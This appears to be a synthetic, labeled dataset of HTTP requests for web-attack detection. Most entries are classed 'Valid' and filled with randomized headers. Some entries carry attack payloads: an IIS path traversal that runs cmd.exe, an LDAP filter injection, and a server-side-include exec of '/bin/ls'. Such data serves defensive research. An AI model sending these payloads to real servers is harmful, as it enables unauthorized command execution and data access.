Range: 191-,663-
Referer: /8roOta.cfm
TE: deflate;q=0.6,deflate
Trailer: Via
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 5.9; ns-Iz; rv:3.9.4) Gecko/82066562
UA-CPU: Sparc
UA-Disp: 470,351,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 230x8850
Via: 6.6 www.hrjnnr2.css
Transfer-Encoding: deflate
Upgrade: rdo/9.5, reg/2.6, padioo/6.0, dtneie/9.6
Warning: 202 111.3.31.14 "p90b64tvti4ta8slh" 
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 1402347100773989
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

toog9seyoee=02001&noit= o

End - Id: 6186
Start - Id: 5730
class: Valid
POST /nbPo/uI/rbEonnhelue4eqeg/fzU/wlv@6dJWbJWwZlmZ/NyMF8LmDrwWAidEq/2wservicessr3n/tesNy0ilxeuaC/om5ahhyBqFZ@h79C1g/i.855/aNihT.jpg? HTTP/1.1
Content-Length: 228
Content-Language: 8nzD,6
Content-Encoding: identity
Content-Location: http://rHegzr.de/2erah4d/otifeber/tDvetcp/n7dodsv.sh
Content-MD5: ZGFlQzR3czh3bU5ob2FxdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 05 Jul 08 23:46:51 CET
Last-Modified: Wed, 10 Oct 07 08:39:47 UTC
Host: www.eltaMt3.net:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: wv-pn;q=0.2
Cache-Control: i=jsi
Client-ip: 76.49.211.252
Cookie: jSaa=no5Pn1;rrsrtgwaeaMehiw=0@dQJb;scriptKu6d=hEsg;og6a=359605;KriDLnetcats3_Jd=2625920
Cookie2: $Version="54"
Date: Thu, 15 Apr 10 02:16:26 UTC
ETag: "jiQXasEX@2DVqAIvgOV"
Expect: irfsl3b9
From: ototLn2u@5heey.uk
If-Modified-Since: Wed, 31 Dec 08 10:47:33 GMT
If-Unmodified-Since: Thu, 20 Jan 05 10:07:55 GMT
If-Match: *
If-None-Match: "W40tz5EhMHqq-VJxn7"
If-Range: Wed, 28 Dec 05 20:33:46 CET
Max-Forwards: 223
MIME-Version: 8.6
Pragma: M=getam
Proxy-Authorization: NTLM YWVueHJpMXNlaGJoRHRqcmd4YW9Tck5lN29hZWhuQkkzZG1mbG9z
Authorization: NTLM dGVSc3R1aG5sc2NuSDEyZjMwbW9hb252bnRyY1Qzc2h1QTBydHJnZW9FZQ==
Range: 40090-
Referer: http://www.wicws.st/gedsAz/odIlaeoe/arytjl.php4
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: sJ3RcOeHk http://www.no9l.st
UA-CPU: PowerPC
UA-Disp: 830,2987,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3416x9061
Via: HTTP/6.4 www.wIaoznom.js, HTTP/9.8 204.236.97.165, 0.7 www.fSd9ra.jpg
Transfer-Encoding: compress
Upgrade: soi/5.7, trhldd/2.6
Warning: 489 154.132.50.60 "g8mjyetalehBscHn" 
X-Forwarded-For: 129.100.56.49
X-Serial-Number: 0056046
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qg=4&w6qnd9=ygrti8Ov&i3elaV=evQ&rohcomtastfouat=aiehhaso&seetMrTotn6e=oCogG8zHJdvI&cTjaruovah=ldropnodee\xupdate0e>xIAPo;iv&nPPOjUliblgE.7=2mlTMKpwe&ntextuZeaTp=eCK.uFJyX&qserrtT=\gsz eliod1metak+ie&doS1siG=3~|5\

End - Id: 5730
Start - Id: 36541
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.3aaen.fr
Connection: sell
Accept: video/mpeg;q=0.9
Accept-Charset: x-mac-arabic, euc-cn, x-mac-arabic, iso-8859-3;q=0.9
Accept-Encoding: *;q=0.2
Accept-Language: Ar-ahJ
Cache-Control: no-transform
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Wed, 17 Sep 08 23:22:13 CET
ETag: W/"4@2UTwY0@UxnP2T2A"
Expect: 100-continue
From: qslOdEWa@reveTya6.com
If-Modified-Since: Sat, 27 May 06 13:23:49 GMT
If-Unmodified-Since: Sat, 09 Jun 07 12:55:59 GMT
If-Match: "YH8pDTSMDUMrn@@zg"
If-None-Match: "DRah4eYE.S8OiDb"
If-Range: *
Max-Forwards: 80
MIME-Version: 3.0
Pragma: n0=Fqvn
Proxy-Authorization: Digest nc=Ad95328B
Authorization: NTLM dHQwYnRHeWRvbXNheXJjZW5oZWloZWE5T3JlbmlzOTJuazBzaHdMdGhlYW5uMmh4
Range: 9206-,968-
Referer: /iNsmtv/uzbe4t2e.cfm
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.8 (compatible; Konqueror/4.9; Win 9x; jwhrxrht7i; eatFd6uinC; eietnlfafE)
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: dTei/6.1 www.Benn.gif
Transfer-Encoding: nm1x
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36541
Start - Id: 8869
class: Valid
GET /6Mngt/doQOeStmP7XG/thZmrvdV6_/hhXxDJe7HjR0M-l/Tee9gwo8rd0ewT8nyh.cfm?usl7e=epz&dstXAr=locationeSol HTTP/1.0
Host: 19.38.56.235
Connection: close
Accept: video/quicktime, text/html;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=0948
Client-ip: 146.119.69.207
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="980"
Date: Wed, 31 Oct 07 21:40:58 GMT
ETag: W/"xpB9lcdUhtkgRzEnu83H"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Mon, 30 Oct 06 06:45:47 CET
If-Unmodified-Since: Fri, 30 Mar 07 13:01:10 GMT
If-Match: "QAZxoZEEcM4YKymP"
If-None-Match: "FjFLAES@Vd693cux"
If-Range: Tue, 29 Jul 08 05:02:20 UTC
Max-Forwards: 11
MIME-Version: 8.5
Pragma: Uh=ho
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: NTLM ZXJ0bTJyOW1uaTAwY0xvb2RlNGNtaHBvc21lc3pyb2FpcnNzRThBb2Q=
Range: 85-
Referer: /es3oe/eGst922.gif
TE: deflate;q=0.1,trailers,deflate;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/6.9 (Windows; U; Windows NT 1.6; mn-1m; rv:6.4.1) Gecko/18879273
UA-CPU: Sparc
UA-Disp: 909,1237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 345x783
Via: FTP/1.7 40.230.32.85:6, weJ/9.1 www.Fexr.jpeg
Transfer-Encoding: compress
Upgrade: 64r/8.7, oderoo/0.3, agsp/5.1, cWlgn/3.7, Gpz/5.9
Warning: 783 35.10.18.150:3 "9nnorlnAnhrie" "Sat, 04 Feb 06 11:45:36 CET"
X-Forwarded-For: 234.237.173.153
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8869
Start - Id: 27136
class: Valid
GET /nC.png? HTTP/1.0
Host: 122.80.60.16
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, iso-8859-3, iso-8859-7, x-mac-chinesesimp, koi8
Accept-Encoding: *
Accept-Language: av-nnokhts;q=0.9
Cache-Control: only-if-cached
Client-ip: 48.50.170.183
Cookie: nTconnectHXPservicesq93T=18583393;ohxauogsllto=rX.;Kehdltssb=enrzsK0;nAi=48004760;oae9wneRntstaer=3489
Cookie2: $Version="2"
Date: Wed, 18 Jul 07 07:00:14 CET
ETag: W/"FXrQF2Py4dPj6v8NX562"
Expect: 100-continue
From: oafdmt@7uzsfmi.ch
If-Modified-Since: Thu, 09 Dec 04 24:50:33 GMT
If-Unmodified-Since: Sat, 03 Jul 04 09:25:04 CET
If-Match: "TaocZqCQ_eW2pgv-U"
If-None-Match: *
If-Range: Sat, 28 Mar 09 23:10:36 GMT
Max-Forwards: 637
MIME-Version: 4.2
Pragma: 4=afeles
Proxy-Authorization: Basic YW90Z3lsbzc6YWFhcm4=
Authorization: Basic aW1zZ0Q6ZXJjc2JuZA==
Range: 876-071,453044-67,-1
Referer: http://sakfi.biz/aoidhfs/g1cfse/tten.zip
TE: deflate,deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/9.0 (Windows; U; Win 9x 1.0; ef-hy; rv:1.8.9) Gecko/22359925
UA-CPU: x86
UA-Disp: 940,210,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 621x863
Via: 7.6 206.48.206.136, FTP/8.4 www.tdYrtO.htm
Transfer-Encoding: compress
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 306 201.137.88.255 "tntlel" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27136
Start - Id: 24990
class: Valid
GET /6y@E8VTL2JNaUWn78U/euJnR1/r0air2ub/wleic4HEaNl2dieSmi/Nb/26ehltdroi0lh6swW/window.openyX.cgi?ntadEsrumehTn=8&Tia8ndne=109606&bgsoundat.3v1@=hr-riunE0a+r%28&yza2itBl=8331&qT3dgh=aal7&cuntg1cietm2ems=866783&mulmtNd=uoiUNtadgehz&noatadGcm=m4aextrwindow.open0erg&bor8letbdn=cTDq71&raewnybN6Dien=+ooaedl&xnNexli4=9876485&pYh=0138&7G3Lb=296&rinQachwgsid=hnt&esbgtsh=mw-lyTriDn HTTP/1.1
Host: www.eEtr.ch
Connection: close
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Ie1ui-sft;q=0.9, gnap4ee-fHj
Cache-Control: max-stale
Client-ip: 19.99.109.42
Cookie: br4onrvmemijnt=ai1id;tte9algosoN=systemm
Cookie2: $Version="88"
Date: Sun, 21 Mar 10 20:12:11 CET
ETag: W/"CvQ_dK.kzcRNGW9HuX"
Expect: dswoo
From: o4oia@etet.cz
If-Modified-Since: Wed, 09 Jan 08 11:14:49 CET
If-Unmodified-Since: Sat, 31 Mar 07 03:14:12 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Feb 09 23:27:37 UTC
Max-Forwards: 7693
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nc=80E9BD9d
Authorization: i19lhl h5rcde=nngN6e
Range: -67,790189-2941
Referer: /ncnefs.msf
TE: chunked
Trailer: Date
User-Agent: nhaibta/9.6.1
UA-CPU: x86
UA-Disp: 4621,3204,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 669x906
Via: HTTP/9.1 189.203.77.236, 3.3 206.66.31.215, tsrs/6.2 142.159.179.12:04
Transfer-Encoding: bgOau; suimhh=ootuse
Upgrade: wth7/8.6
Warning: 455 158.166.248.85 "sol2reua6sehmtdo" 
X-Forwarded-For: 149.39.124.54
X-Serial-Number: 4634746
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24990
Start - Id: 6974
class: Valid
PUT /jQmfGI7b1L@EcN/aUcYnyO3OZtYM/j2R4.jpg? HTTP/1.1
Content-Length: 215
Content-Language: hTuno,ill,etirwnit
Content-Encoding: compress
Content-Location: /LhrnNut.exe
Content-MD5: aTFPaWh0aWl1bzJjdWFkbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Jan 10 17:18:14 UTC
Last-Modified: Mon, 26 Apr 10 03:37:07 CET
Host: 180.158.24.248
Connection: eefb
Accept: video/*;q=0.6, audio/basic;q=0.1
Accept-Charset: hz-gb-2312, x-mac-chinesesimp;q=0.2, cp-936;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: u-b8uchhd;q=0.4, 9-19j;q=0.3
Cache-Control: no-store
Client-ip: 252.24.113.133
Cookie: FSendetpan0lazq=qih9;OWAV0CRIlocationsdocumentS=a7VEEMyh1tqo;syfrn7axiUdvti=rneTecet;am=s xml=xsa
Cookie2: $Version="082"
Date: Fri, 25 Dec 09 15:37:21 CET
ETag: W/"NL_m1mDqJIQByLH"
Expect: 1em8
From: coetw@Dezgd.biz
If-Modified-Since: Tue, 15 Apr 08 02:50:25 GMT
If-Unmodified-Since: Sat, 25 Sep 04 08:15:43 CET
If-Match: "Nqy4JM.EQCF1tkLaR"
If-None-Match: "GG3aKojE_-mp5_JX@j"
If-Range: Thu, 10 Dec 09 06:29:24 UTC
Max-Forwards: 9367
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: etqed ta3i=hoyrwo
Range: 2338-,-6,504171-
Referer: http://www.askz.de/cr1a/ssf1/ehiwdo.dll
TE: gzip;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: ezcreyprhvnmr
UA-CPU: 68000
UA-Disp: 535,687,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 0.2 173.22.97.34, tw8o7E/4.9 16.114.166.47
Transfer-Encoding: compress
Upgrade: srd/5.1, ndhns/4.1
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 5.129.82.226
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

2qO_6-=4554&ailAhdvt=mwer&tiCrt=4T_AbFVO&tici=tot6iojneaiaNqin&danm7huazenu=o 'ssock_stream'5t>lautoexecu~n(n/&g4hAEkm3=918&noloies=044&tsrtpNqstwemezn=0861&isytla8=\heo&syw=txae2n&4a9uNZXJj=7370725224

End - Id: 6974
Start - Id: 20890
class: Valid
GET /92OR5j...O8GLx/tPkWLxrmDr/wqitoit41toe/phA/2D2f1DAbw/eSNwSYLzfp8/tEt@61b/1BW/4CtelnetWposition0nWTTj8DUW/0e2lilotrheyOad.css? HTTP/1.0
Host: 219.54.206.50:1
Connection: ae6ac
Accept: */*;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.9, identity
Accept-Language: *
Cache-Control: min-fresh=1531
Client-ip: 226.250.147.112
Cookie: 8efX=edtrYn|wdeEL;ngkiqrY9ell0=ldso
Cookie2: $Version="19"
Date: Wed, 11 Feb 04 09:36:23 CET
ETag: "1Bq-qkQgtVJspW-hek"
Expect: 100-continue
From: gWrr@gspew.org
If-Modified-Since: Sat, 12 Nov 05 07:51:08 UTC
If-Unmodified-Since: Sun, 08 Nov 09 23:36:13 GMT
If-Match: "Mlp.K1dYIq1H9VcU_"
If-None-Match: *
If-Range: "sivAnhvKAhJqBUz"
Max-Forwards: 8
MIME-Version: 1.4
Pragma: ectx=mpvewacm
Proxy-Authorization: NTLM T0doeUppcnNockVpYWlyYmJlRUl1ZGhvcjBlbmhlb2tzbzJuYWVldGVyaWdkYTEw
Authorization: raoi neste=eoNienig
Range: 822099-090,811-0
Referer: http://uAeTtomh.com/rg10icSn/8ornh/efrtitq/nyles.mp3
TE: chunked;q=0.7,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (Windows; U; Win 9x 0.9; um-6d; rv:1.4.5) Gecko/65916694
UA-CPU: PowerPC
UA-Disp: 743,400,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 2726x7026
Via: 0.5 79.134.59.73, 9.3 224.133.43.129, 9.2 www.esiaRmh.tiff:925
Transfer-Encoding: gzip
Upgrade: l2sonl/9.3, rwue/0.0
Warning: 436 135.104.177.87:1264 "dhiTIi5ayllgdbbitob" 
X-Forwarded-For: 138.202.93.19
X-Serial-Number: 961731
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20890
Start - Id: 3979
class: Valid
POST /oJEexr/s7m/aIDFQ/t2isptntgWdbeprrse/orm_bJtCNBSn8P-Fj/asihen/o8rezares/A5RGbn80nphrrecnpm/bp1QGe1n/ecmi/ua/aoCSoXe.htm? HTTP/1.0
Content-Length: 53
Content-Language: 6tod
Content-Encoding: gzip
Content-Location: http://www.nJhtv.net/io6ed/auies.js
Content-MD5: dnNmYWllY3NjbG1tZWVrYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 May 07 03:59:37 GMT
Last-Modified: Thu, 25 May 06 03:39:07 CET
Host: 2.232.162.5
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: lwnmee-ioeaas;q=0.5
Cache-Control: max-age=28404
Client-ip: 0.203.100.90
Cookie: eYpcwkeShu=66ef;eIZDhF8=n0uoUjT2VR0;mtwt5ee6aAtN=-tnRw$ Ei;Tf7tncirnwlGgn=om
Cookie2: $Version="5"
Date: Fri, 25 Jul 08 08:53:42 UTC
ETag: W/"p6avkn.BqpRID5h"
Expect: ehypnlv=tatcoeF;ao0us5
From: mdue@xtsaa.biz
If-Modified-Since: Thu, 22 Sep 05 03:13:06 UTC
If-Unmodified-Since: Sun, 24 Jul 05 20:32:18 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 03 May 04 11:26:49 UTC
Max-Forwards: 79
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: sMt2 aeatsne=apelon
Authorization: Basic b2EycGVqOml3d2U=
Range: 4-256020
Referer: /alesc/nnucyumu/oenwic.zip
TE: chunked;q=0.9,deflate;q=0.0,trailers
Trailer: Proxy-Authorization
User-Agent: lVpkALmgK http://www.eeorge.de
UA-CPU: Sparc
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 881x617
Via: 6.9 221.135.102.217
Transfer-Encoding: identity
Upgrade: qlt/4.2, yH3mhr/1.4, uriEl/1.6, bai/1.4
Warning: 761 32.233.129.177:90099 "ciesoeid" 
X-Forwarded-For: 189.95.227.203
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

optEtltofuasuir=dh9hbfselethmoisld&uaC.JHPincludeuU=4

End - Id: 3979
Start - Id: 13498
class: Valid
GET /3uHYYF8YSpXgkUw0X81g/eQykNg_C/slti-4iSWp/42/ayl/b6soI0E7miEoHUmvO/oXc/les3bb4rTlAyi6E/vTKItelnetH/IQLwgW097Vscript6Qep/W7aomrcaei.gif? HTTP/1.1
Host: 248.11.35.226:3188
Connection: keep-alive
Accept: text/*, application/*
Accept-Charset: x-mac-roman, windows-1250;q=0.8, iso-8859-7;q=0.7
Accept-Encoding: *
Accept-Language: l19g-ic5ntods;q=0.8, hv-eemef;q=0.6, bEtie45H-dtetmu;q=0.6, zE-6d, shr-deeii
Cache-Control: max-age=95396
Client-ip: 180.68.206.0
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="03"
Date: Tue, 02 Sep 08 09:03:20 GMT
ETag: W/".83G8rujyPNr14b68"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Thu, 30 Aug 07 06:06:57 CET
If-Unmodified-Since: Tue, 01 Mar 05 16:01:07 GMT
If-Match: *
If-None-Match: "X3eO8Ek.gFTBsk_"
If-Range: Mon, 15 Jan 07 11:59:59 CET
Max-Forwards: 4592
MIME-Version: 8.8
Pragma: gAcs='evi'
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: heja dqamer=tdaledtt
Range: 81977-983962,396-,08380-3287
Referer: http://www.4htn2e.biz/cca9tah.cgi
TE: trailers,trailers
Trailer: Expect
User-Agent: cfdTopp6e (odwS8n-W)
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: 2.1 www.0hebdsEl.tiff, FTP/5.0 6.54.214.187
Transfer-Encoding: gzip
Upgrade: sldtn/3.8
Warning: 109 178.4.211.203 "uhlowDrttArs" "Fri, 26 Feb 10 23:40:50 GMT"
X-Forwarded-For: 102.230.110.42
X-Serial-Number: 44417038819
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13498
Start - Id: 21034
class: Valid
GET /u1c6/x9oFTIekP/to8t2dtKs/o299epfQy/htpasslU1gDA4Nqzxh_.cfm?oogk=3382&hEO.=d1pVRsNk&ejhqe38vD=e5 HTTP/1.0
Host: 84.183.239.38
Connection: ote5me
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.6
Accept-Language: mh24iyee-hr1a2v9z, Ih-ndttn;q=0.0
Cache-Control: no-cache
Client-ip: 7.237.11.250
Cookie: eaotp=0c no
Cookie2: $Version="481"
Date: Sat, 20 Mar 10 12:31:23 UTC
ETag: "pj3rv4NxlSh11dR2ejY"
Expect: epese=5Pnfa
From: hrtiet@tsotaco.it
If-Modified-Since: Sun, 27 Mar 05 22:08:01 UTC
If-Unmodified-Since: Tue, 06 Oct 09 19:12:57 GMT
If-Match: "mtQhTrXpPID0Y4-"
If-None-Match: "oDKeBzomdvxIiNyJ5gs"
If-Range: *
Max-Forwards: 2984
MIME-Version: 3.4
Pragma: 2rv='Dscse'
Proxy-Authorization: Basic b2h0cGVlbDpsbHFzZGlt
Authorization: Basic bld3MW5lZWg6YWRvNg==
Range: 98-,136-
Referer: http://dRt4btEu.ch/aSh1/eshtomOr.jsp
TE: chunked,gzip
Trailer: If-Modified-Since
User-Agent: aMeeUse (oymbIZ9; uYD.GT; mGEl5DmUE; dGf-yMD5P8)
UA-CPU: 68000
UA-Disp: 1375,066,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 985x390
Via: FTP/6.3 www.umcieet.png:5, FTP/8.5 246.132.128.186:78078, FTP/7.5 www.8SokLoe.shtml:77
Transfer-Encoding: identity
Upgrade: stlms2/7.1
Warning: 840 www.nusetr.jpg "slnpcuh" 
X-Forwarded-For: 120.235.145.125
X-Serial-Number: 650978480578430420
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21034
Start - Id: 16308
class: Valid
GET /t02AyYSne0F9NBL8Q9Bq/sO8jjB5v7y3U.swf?knleoacrel=nCnm%5Cconnectuaeit%3Fqslinkmht%3F&gdibeobkdr=t4%3F%25Ai%26psftpSHhefmail6w&sglqadR=sfa%3B+bodyieG+ebodyl%27&dts=olm3M.DGcrIl&7T=hwarw&YchnoderSzE=635587322&xterm-mxB=akh HTTP/1.1
Host: www.reeliiqee.fr
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: lj24jyu-eyg
Cache-Control: no-cache
Client-ip: 49.102.20.12
Cookie: attNonfad=dYEb;rumnmrpe=ouenMbelIbwey;eastart=411;bler=na;sl78Unn=0oa7md0d;4null5Vwp-@z_Wk0U=uiwexeegar
Cookie2: $Version="3"
Date: Wed, 07 Jan 04 09:40:45 UTC
ETag: "yxCto0OyfXei6KRuEs"
Expect: 100-continue
From: rgzsla@yEtrran.fr
If-Modified-Since: Mon, 20 Oct 08 08:37:21 CET
If-Unmodified-Since: Mon, 03 Sep 07 07:40:32 UTC
If-Match: "tyH88ayMNn-tnVv3Mmu2"
If-None-Match: "phJST@p5He4RFTzvbv@"
If-Range: Fri, 10 Dec 04 09:56:06 GMT
Max-Forwards: 42
MIME-Version: 2.4
Pragma: Ubpseif='E5chosm'
Proxy-Authorization: Basic eXR1aDJyNDpvaXR0
Authorization: 7hdc iraE=osfs
Range: -652120,9-,091-
Referer: /dlCt/zsbs7.mp3
TE: chunked;q=0.0,deflate
Trailer: Accept-Charset
User-Agent: ikchiP6kem8nem
UA-CPU: 68000
UA-Disp: 6300,4567,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8017x209
Via: HTTP/7.7 www.ykno.shtml, 0.0 235.120.34.203
Transfer-Encoding: identity
Upgrade: znuO/5.9, rnoe23/2.5, sutmh/9.2, Paxtie/5.0, dcrIu3/2.7
Warning: 902 73.181.232.48 "htuwwet8tesasuA" 
X-Forwarded-For: 126.236.238.240
X-Serial-Number: 39357482225884778580
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16308
Start - Id: 38432
class: LdapInjection
GET /1fqMZ3VZxIGe839S8/s2mfRii4silrat72V/aYrMbinkq48zskVhg/nGDS8R6pumtk8yXw@7F/arr7neOireo6iop/edou/PgNB/pyatatray0ehe.exe?I1tsitbu3=08%29%28%26%28objectClass%3Ddhe0%29%28%7C%28sn++++%3D++sc9%29%28cn%3Dt2ya+J*%29%29&om5ir8ndn3rlori=Ennlemr1niuir&h6awdodla3tt=galldocumentNzdnadahres&2m5iiae=cdrfjop&odoo=nvNFt&im=%25binr&woftqP2n_j=dtmE8HIO7IFN&rn=l%3Dkowget&rhtll4Ovoaoeo=9libqi&nrthpi=ididId+iframe0nc9menSs&@UO@2e4K=977979&qpnlta6g0m=082&IRFTO=4536812&PvHIselectFI=6071 HTTP/1.0
Host: 229.167.192.41
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: x-mac-roman;q=0.4, windows-1258, euc-cn, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 37.157.72.85
Cookie: miiu1ealeehl=rFrecrp;afi=cchildi77ili;nPolBhS=e9sAhr;Ireplace-WgxmlhttpF_=82068;iheos=ot ;GSdJnevalsc=nSal
Cookie2: $Version="91"
Date: Wed, 13 Aug 08 01:18:55 UTC
ETag: "h2hIDmqhIElhbZTSdh1"
Expect: 100-continue
From: Le6sx3@8TUli.gov
If-Modified-Since: Thu, 14 Oct 04 14:45:29 GMT
If-Unmodified-Since: Thu, 10 Jul 08 13:09:39 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 429
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="twseli3"
Authorization: Digest username="ieoi"
Range: -03,38-
Referer: http://ayampf.org/hrmpitoe/ctls/sAba.wmn
TE: gzip
Trailer: Transfer-Encoding
User-Agent: mfrTyat (fDQ05xlg; pzx8BAG; kaT.vl0zpA; enG1km2kCp)
UA-CPU: 68000
UA-Disp: 471,4327,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0696x1408
Via: HTTP/5.6 www.nfyinLsr.png:5088, FTP/6.0 www.hnaeu7si.tiff, vhoat/7.0 www.gsod.jpg
Transfer-Encoding: identity
Upgrade: lig/4.2, roeri/4.4
Warning: 498 www.qbdd.css:76 "iEsitooO9Eeo" "Mon, 07 Mar 05 03:32:44 UTC"
X-Forwarded-For: 180.11.72.245
X-Serial-Number: 8565701730547644653
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38432
Start - Id: 40130
class: SSI
GET /pR/Eg9qcbmto.jpg?rwptte4sYtdndSl=Lmhos1ondcspthiEe4&wsgra54g9qvize=%3C%21--%23exec++cmd%3D%22%2Fbin%2Fls+-l+++++%2Fhome%2FaltRsspiet%2Fmet%22++++--%3E HTTP/1.1
Host: www.onbgH6.biz
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-oNnsauce, b-wir;q=0.6, twxaiffb-awfsybd;q=0.0
Cache-Control: max-age=0365
Client-ip: 93.85.29.94
Cookie: yICvmPvj-Sq=47
Cookie2: $Version="601"
Date: Wed, 23 May 07 13:12:22 UTC
ETag: "4pxO4td__ZtpNlZm8MFK"
If-Modified-Since: Fri, 31 Oct 08 17:08:10 CET
If-Unmodified-Since: Tue, 12 Aug 08 18:58:28 UTC
If-Match: *
If-Range: *
Max-Forwards: 01
MIME-Version: 6.1
Pragma: c1eqnn=a
Proxy-Authorization: Basic b290UzpiY3R6
Authorization: 51Ar 5shchs=xydnaakN
Range: -7823
Referer: /rtey/nfcw/8eebvwoF.mdb
User-Agent: ds9lrncAm (subwEt; 94n_o1; w@2H51_; reuK4Oq4; 1m@531u1)
UA-Color: color32
Transfer-Encoding: identity
Warning: 305 53.141.60.13 "ymreiTeeg1dos2e" "Sun, 14 Oct 07 07:03:33 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40130
Start - Id: 42054
class: SqlInjection
